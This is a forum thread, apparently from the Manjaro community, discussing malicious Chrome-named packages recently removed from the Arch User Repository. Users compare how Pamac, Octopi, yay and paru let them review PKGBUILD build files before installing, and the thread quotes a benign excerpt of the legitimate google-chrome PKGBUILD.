Not just one, I saw a few in my feed - first ‘google-chrome-bin’ but also ‘chrome-bin’ 15 hours ago,

…yes, indeed. There were quite a few.

Thanks to everyone that keeps an eye on new AUR package submissions and submit deletion requests for garbage of any kind–Arch Linux team members were able to remove them within hours. More than likely not a single user installed any of them.

It’s maybe time to stop AUR submission in some way… Control more what’s going on there…

If the trend continue - I am fairly certain some control measures will be put in place.

The latest incidents only confirms what has been written and said for years.

Warning: AUR packages are user-produced content. These PKGBUILD s are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

– Arch User Repository - ArchWiki

And possibly why Arch Linux does not provide any AUR helper scripts.

Sure, perhaps there’s going to be some kind of buffer - or at least a warning for freshness… these are only brand new uploads, and overall they don’t look as if they can catch anyone more than a few fresh PewDiePie fans.

I’m not really worried by them at all, but I’m slightly annoyed at the social fallout - just last night someone using Fedora boasted how they’re happy they’re not dealing with a ‘malware infested AUR’.

A guess - it was reddit user?

It tells me it is a consumer… Manjaro get that kind of user from time to time - especially when Manjaro is praised on a youtube video - the next that happens is… well - history

Some things about pamac are excellent, for example - the GUI. Open it and type ‘chrome’ or even ‘google chrome’:

Click through to get excellent details (last modified, FIRST SUBMITTED, Maintainer/Votes…)…

However, no pkgbuild.

From the terminal:

pamac search chrome
pamac search google-chrome

Well yes, there’s no fuzzy delight as with the GUI here… but the latter line gives us a colourless readout… and no click-through or index number to select an option to go to the info page.

This should be added:

    Standalone server that implements the W3C WebDriver standard (for google-chrome)
metamask-google-chrome  12.18.1-1                                                                                                                                              AUR
    Browser extension that enables browsing Ethereum blockchain enabled websites
4. google-chrome-dev  140.0.7327.6-1  (AUR)                                                                                                                                           
    The popular web browser by Google (Dev Channel)
3. google-chrome-canary  140.0.7328.0-1  (AUR)                                                                                                                                           
    The popular web browser by Google (Canary Channel)
2. google-chrome-beta  139.0.7258.66-1     (AUR)                                                                                                                               
    The popular web browser by Google (Beta Channel)
1. google-chrome  138.0.7204.183-1       (AUR)                                                                                                                                 

So then hitting number 1. should go first to the initial review:

With options to then ‘Proceed to review: y/N’ (N then exits or returns to the listing):
`

# Launcher
install -m755 google-chrome-$_channel.sh "$pkgdir"/usr/bin/google-chrome-$_channel

# Icons
for i in 16x16 24x24 32x32 48x48 64x64 128x128 256x256; do
	install -Dm644 "$pkgdir"/opt/google/chrome/product_logo_${i/x*/}.png \
		"$pkgdir"/usr/share/icons/hicolor/$i/apps/google-chrome.png
done

# License
install -Dm644 eula_text.html "$pkgdir"/usr/share/licenses/google-chrome/eula_text.html
install -Dm644 "$pkgdir"/opt/google/chrome/WidevineCdm/LICENSE \
	"$pkgdir"/usr/share/licenses/google-chrome-$_channel/WidevineCdm-LICENSE.txt

# Fix the Chrome desktop entry
sed -i \
	-e "/Exec=/i\StartupWMClass=Google-chrome" \
	-e "s/x-scheme-handler\/ftp;\?//g" \
	"$pkgdir"/usr/share/applications/google-chrome.desktop

# Remove the Debian Cron job, duplicate product logos and menu directory
rm -r \
	"$pkgdir"/etc/cron.daily/ \
	"$pkgdir"/opt/google/chrome/cron/ \
	"$pkgdir"/opt/google/chrome/product_logo_*.{png,xpm} \
	"$pkgdir"/usr/share/menu/

With yay and paru my ‘Review’ presents the pkgbuild open with micro at the moment… to read and possibly edit.

Finally closing that with the option to continue or abort and clean up.

You would expect the PKGBUILD to be proudly displayed on demand? Seriously? Yes! Seriously!

With pamac-cli we’re able to view/edit the PKGBUILD, and for those who are aware of it; those who have any idea of how the AUR works; that’s a good thing.

That’s not an option in pamac-manager, is it…

Perhaps it should be.

That is, unless knowing the content of a PKGBUILD prior to building is considered unnecessary for target user groups of Pamac.

It is an option in octopi.

Jus’ sayin’…

Indeed.

It just makes sense to have that capability. It shouldn’t be considered a feature to be added on a whim, but a necessity, especially given the recent spate of events.

Nowhere was it found what the malicious package actually did. Arch just says to take appropriate measures, well what are those as the package is no longer available so it’s impossible to look what it did?

It downloaded some kind of malware from a third-party site during installation of the browser, and this malware would become active — but running as a background process — every time the user launched the browser.

What the malware did exactly was not revealed. The two most common exploitations like this would be opening a backdoor into the system — albeit only with the user’s privileges, but if it’s a key logger, then they might be able to read passwords — and/or cryptocurrency mining.

well all of that was clear, but i wonder Arch practices for not making it explicit so affected users could know what to do…

Maybe the admin who removed it was having a Bad Hair Day™?

No-one wants to reveal their sources.

Still, the fact that this can happen at all sends a clear message that the AUR cannot be guaranteed to be relied upon from a security perspective.

Perhaps there should be a MVUR, of sorts.

Manjaro (Verified) User Repository.

like the minimum would be to archive the github script that was executed and any secondary source files it pulled in.

My my, then what happened to Open Source?

That would require money and resources we don’t have.

Yeah, but maybe the admin in question didn’t want to bother, or simply forgot?

Humans are a strange and unreliable species.

Yes, yes. It it goes hand-in-hand with edible paper, I suppose, but from a conceptual standpoint it should lessen the risk to some extent.

Oh, great… so install Octopi… looking in settings, can enable AUR voting - but sadly there’s no logical way to enter credentials (it just opens the AUR website where you can log in, but there’s no visible way to enter these in the GUI).

So maybe you need to write an extensive tutorial that explains just how we can find Chrome in there… 'cos I can’t.

And as our malware friends know, we really want to install Chrome.

Octopi - enter chrome - result…
vlc-plugin-chromecast 3.0.21-27.

Ok, this is your weapon of choice and you’re very welcome to keep it.

In Pamac, you can find the package google-chrome with that search, as with paru - and also with a web search; don’t forget, we have pamac-manager, which brings up:

Google Chrome 138.0.7204.... Flathub
Google Chrome 101.0.4951... Flathub-beta
Google Chrome (unstable) 140.0.7.... Flathub
add Chromium to that list and it's on the first page.
Google-Chrome 138.0.7204 (Stable) (AUR)
ungoogled-chromium-bin
ungoogled-chropmium
google-chrome-dev
google-chrome-beta

Moving on… paru chrome similar results to yay:
9. aur/google-chrome, followed by -dev -beta etc.
pamac search chrome - sucks a bit, no highlighting or colour though results are there if you scroll up (but then there’s no index to take you install it…).

So then you’d follow up with pamac -Si google-chrome to get the first information, then another search for another variant (and ALL variants would be listed with the AUR search:
https://aur.archlinux.org/packages?O=0&SeB=nd&outdated=&SB=p&SO=d&PP=50&K=chrome
better if you then select ‘search by name’.

I’ll be honest, I’m happier with my workflow - just enter ‘AUR google-chrome’ and the page opens in my browser - all the helpers are just scraping partial information from there… and if you START with the browser, you’ll get all the information outside repositories - including AUR, Flatpak and anything else available.

So back to the original story here - there are folks saying ‘Linux needs to protect us’ which is rather amusing.

My preference, however, is to first search - pamac-manager is the first port of call for Manjaro users, so you cannot exclude that (though I know you’d like to), and in this case we found it, clicking through google-chrome we’re then taken to the obligatory summary page, which gives us the first subbmission date (2010) which is reassuring, the last modified date show’s it’s not unmaintained (30th Jul '25) and the Votes are 2291 - very popular gives us some feeling of safety in numbers.

The other huge feature that pamac-manager brings is that IT DISPLAYS THE AUR PAGE LINK prominently at the first review stage… which is where you should always go to review your software before installing.

psycloneeee commented on 2025-08-01 01:33 (UTC): note that the package “google-chrome-stable” has been compromised and will install a RAT on your computer. this package is fine.

I don’t know about octopi 'cos I couldn’t even find the damn thing.

So really, the main improvement I’d like now is that pamac do the same job in the terminal… bringing up a nicely formatted (highlighted and coloured) guide to results with indexing, so we can punch in a number to go through to the next stage which would be similar information to pamac-manager with a link to the full web page and then a link to continue to the install.

That’s all.

Build files can be viewed and edited in Pamac GUI before building

pamac_chrome_pkgbuild804×740 70.7 KB

For Pamac CLI use E to view/edit build files in nano

$ pamac build google-chrome
Preparing...
Cloning google-chrome build files...
Generating google-chrome information...
Checking google-chrome dependencies...
Resolving dependencies...
Checking inter-conflicts...

To build (1):
  google-chrome  138.0.7204.183-1    AUR


Edit build files : [e] 
Apply transaction ? [e/y/N]

maybe also: Mad as a hatter - Wikipedia

Arch provided the names of the packages after they were removed so users could check if they were affected

Arch and Manjaro are both explicit that AUR is not officially supported

But AUR is not 'nam, there are submission rules

AUR submission guidelines - ArchWiki

Warning: Before attempting to submit a package you are expected to familiarize yourself with Arch packaging standards and all the articles under “Related articles”. Verify carefully that what you are uploading is correct. Packages that violate the rules may be deleted without warning.